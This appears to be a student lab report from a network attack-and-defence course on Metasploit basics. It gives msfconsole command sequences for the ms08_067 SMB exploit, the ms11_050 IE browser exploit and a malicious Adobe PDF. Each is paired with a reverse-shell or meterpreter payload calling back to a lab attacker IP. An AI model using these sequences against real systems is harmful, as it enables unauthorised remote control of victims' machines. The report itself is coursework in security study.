2017-2018-2 20155310『网络对抗技术』Exp5：MSF基础应用

2017-2018-2 20155310『网络对抗技术』Exp5：MSF基础应用

基础问题回答

用自己的话解释什么是exploit,payload,encode

exploit：由攻击者或渗透测试者利用一个系统、应用或服务中的安全漏洞

payload:攻击载荷，如后门等攻击代码。

encode：指编码，对我们的程序或代码进行伪装。

实验内容

一个主动攻击实践，如ms08_067

1.启用msf终端msfconsole

2.然后使用search命令搜索该漏洞对应的模块：search ms08_067

3.渗透攻击模块路径名为“exploit/windows/smb/ms08_067_netapi” 包含四部分：模块类型、目标平台、目标服务和模块名字。

use exploit/windows/smb/ms08_067_netapi

1.查看信息：

show payloads

2.选择攻击载荷：

set payload generic/shell_reverse_tcp

3.查看配置渗透攻击所需的配置项：

show options

4.查看渗透攻击模块所能成功渗透攻击的目标平台

show targets

5.用show payloads查看可以供我们使用的攻击载荷：

6.从中找到一个可用的攻击载荷generic/shell_reverse_tcp，用set payload generic/shell_reverse_tcp设置payload：

7.用show options查看需要设置的参数

•这里需要设置RHOST（靶机IP）和LHOST（Kali的IP），使用set 需设置的参数名 参数值命令即可设置：

8.设置target选项目标（例如我攻击系统为WIN xp 中文简体 SP2，所以选择10）

•确认参数设置无误后，用exploit指令开始攻击：

9.攻击成功后会获取靶机的shell，可以对其进行操作：

一个针对浏览器的攻击，如ms11_050

在攻击机kali输入msfconsole进入控制台，依次输入以下指令：

msf > use windows/browser/ms11_050_mshtml_cobjectelement//使用浏览器ms11_050漏洞

msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http //http反向回连

msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.136.130 //攻击机ip

msf exploit(ms11_050_cobjectelement) > set LPORT 5310 //攻击端口固定

msf exploit(ms11_050_cobjectelement) > exploit

用exploit指令开始攻击，攻击成功后会有靶机需要访问的网址：

在靶机IE上输入该网址

kali中显示session 1已经创建，并显示其会话ID

但是修改Internet的安全设置后失败了！

一个针对客户端的攻击，如Adobe

在攻击机kali输入msfconsole进入控制台，依次输入以下指令：

msf > use windows/fileformat/adobe_cooltype_sing

msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp //tcp反向回连

msf exploit(adobe_cooltype_sing) > set LHOST 192.168.136.128 //攻击机ip

msf exploit(adobe_cooltype_sing) > set LPORT 5310 //攻击端口

msf exploit(adobe_cooltype_sing) > set FILENAME 20155310.pdf //设置生成pdf文件的名字

msf exploit(adobe_cooltype_sing) > exploit//攻击

成功生成20155310.pdf:

将pdf文件传送或拷贝到靶机上后，在kali上输入back退出当前模块，进入监听模块，输入以下命令：

msf > use exploit/multi/handler //进入监听模块

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接

msf exploit(handler) > set LHOST 192.168.136.128 //攻击机ip

msf exploit(handler) > set LPORT 5310 //攻击端口固定

msf exploit(handler) > exploit

然后在靶机上打开20155310.pdf文件

成功应用任何一个辅助模块

用show auxiliary查看所有辅助模块，并选择其中的一个，选的是scanner/ip/ipidseq：

查看需要设置的参数，设置完成后确认一下，这里可以进行对单一目标主机的扫描，然后就可以开始exploit了。

也可以对指定网段的主机进行扫描：

实践总结及体会

本次实验可以说是十分艰难了，主要在环境的配置上，自己配置了好久但还是不成功，最后拷了配置好的虚拟机。虽然整体实验流程并不复杂，但是仍然有失败的。通过这次实验感受到了msf工具功能的强大。